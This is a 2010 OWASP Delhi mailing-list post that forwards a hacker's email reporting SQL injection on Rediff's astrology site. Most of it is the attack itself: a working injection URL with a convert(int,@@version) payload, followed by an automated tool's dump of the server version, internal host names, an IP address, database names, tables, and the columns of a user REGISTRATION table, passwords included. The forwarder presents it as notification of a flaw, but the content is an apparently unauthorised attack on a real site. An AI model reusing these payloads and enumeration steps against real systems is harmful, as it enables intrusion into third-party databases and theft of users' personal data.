[Owasp-delhi] Rediff Astrology

Soi, Dhruv dhruv.soi at owasp.org
Mon Jun 14 13:47:28 EDT 2010


Another one to notify Rediff that readers' daily fortune can be fixed by
someone.Seems Rediff needs a lot of OWASP, do inform them that its free!!

 

From: "Jack H4xor" 
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

 

y0,


h0rr1bl3 th4n h0rr0r

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Sco
rpiox%27%20OR%201=convert%28int,@@version%29--

 

********************************************************************


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++









+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +









++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++









[ + ] URL :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo






diac=Scorpiox'








[ + ] Date: Tue May 18 20:58:26 2010


[ + ] Displaying information about MSSQL host !





[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)






                        Aug  6 2000 00:57:48


                        Copyright (c) 1988-2000 Microsoft Corporation


                        Standard Edition on Windows NT 5.0 (Build 2195:
Service


Pack 4)





[ + ] USER ()          : dbo






[ + ] S_USER ()        : astrology


[ + ] DB_NAME ()       : astro


[ + ] HOST_NAME ()     : ASTROLOGY


[ + ] SERVER_NAME ()   : SEARCHDB


[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0


[ + ] X-POWERED-By ()  : ASP.NET






[ + ] IP_ADDRESS_INFO  : 202.54.124.173








[ - ] We Can't get number of Databases !









[ ! ] Start dumping database Names !






[ ? ] But first choice number of DB to dump :> 20









[ + ] Displaying list of 20 databases on this MSSQL host !









[ DATABASE: 0 ]        : astro






[ DATABASE: 1 ]        : master






[ DATABASE: 2 ]        : tempdb






[ DATABASE: 3 ]        : model






[ DATABASE: 4 ]        : msdb






[ DATABASE: 5 ]        : pubs






[ DATABASE: 6 ]        : Northwind






[ DATABASE: 7 ]        : travel






[ DATABASE: 8 ]        : travel_int






[ DATABASE: 9 ]        : astro






[ DATABASE: 10 ]        : Jobsearch






[ DATABASE: 11 ]        : astroyogiD






[ DATABASE: 12 ]        : matrimonial






[ DATABASE: 13 ]        : investornew






[ DATABASE: 14 ]        : test









[ ! ] Vulnerability Database is   :  astro









[ + ] Displaying Tables inside DB :> astro









[ ? ] Numbers of Tables To Dispaly ?






[ + ] Specify Numbers   :> 200









[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION






[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER






[ TABLES: 2 ]          : astrolove






[ TABLES: 3 ]          : astroparent






[ TABLES: 4 ]          : CITY






[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL






[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL






[ TABLES: 7 ]          : COUNTRY






[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS






[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER






[ TABLES: 10 ]          : CUSTOMER_PERSON1






[ TABLES: 11 ]          : CUSTOMER_PERSON2






[ TABLES: 12 ]          : CUSTOMER_PERSON3






[ TABLES: 13 ]          : darshtest






[ TABLES: 14 ]          : dtproperties






[ TABLES: 15 ]          : FENGSHUI






[ TABLES: 16 ]          : FRANCHISEE_MASTER






[ TABLES: 17 ]          : idealmate






[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER






[ TABLES: 19 ]          : NUMEROLOGY






[ TABLES: 20 ]          : ORDER_DETAILS






[ TABLES: 21 ]          : ORDER_MASTER






[ TABLES: 22 ]          : ORDER_REMARKS






[ TABLES: 23 ]          : ORDERS






[ TABLES: 24 ]          : p1






[ TABLES: 25 ]          : p3master






[ TABLES: 26 ]          : PALMISTRY






[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER






[ TABLES: 28 ]          : PROBLEM_ANSWER






[ TABLES: 29 ]          : PROBLEM_CATEGORY






[ TABLES: 30 ]          : REGISTRATION






[ TABLES: 31 ]          : SHIPPING_DETAILS






[ TABLES: 32 ]          : SPCFIC_ANLYS






[ TABLES: 33 ]          : SUBSCRIBER_DETAILS






[ TABLES: 34 ]          : SUBSCRIBER_MASTER






[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION






[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION






[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS






[ TABLES: 38 ]          : SUBSCRIPTION_MASTER






[ TABLES: 39 ]          : sysconstraints






[ TABLES: 40 ]          : syssegments






[ TABLES: 41 ]          : test






[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION






[ TABLES: 43 ]          : zodiac









[ + ] Done !









[ + ] Start dumping all Columns from table :> REGISTRATION









[ ? ] Numbers of Columns To Display ?






[ + ] Specify Numbers    :> 50









[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro









[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID






[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID






[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS






[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY






[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE






[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE






[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR






[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES






[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO






[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY






[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE






[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID






[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME






[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER






[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID






[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP






[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME






[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD






[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO






[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME









[ ! ] Done !









[ ! ] All information was recorded in astrology.rediff.com.txt file !









[ 1 ] : Return to Tables  !






[ 2 ] : Return to Columns !









[ ? ] : Oprion :>












Thanks & Regards


Jackh4xor


( h4cky0u )
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100614/eeb1081b/attachment-0001.html 


More information about the Owasp-delhi mailing list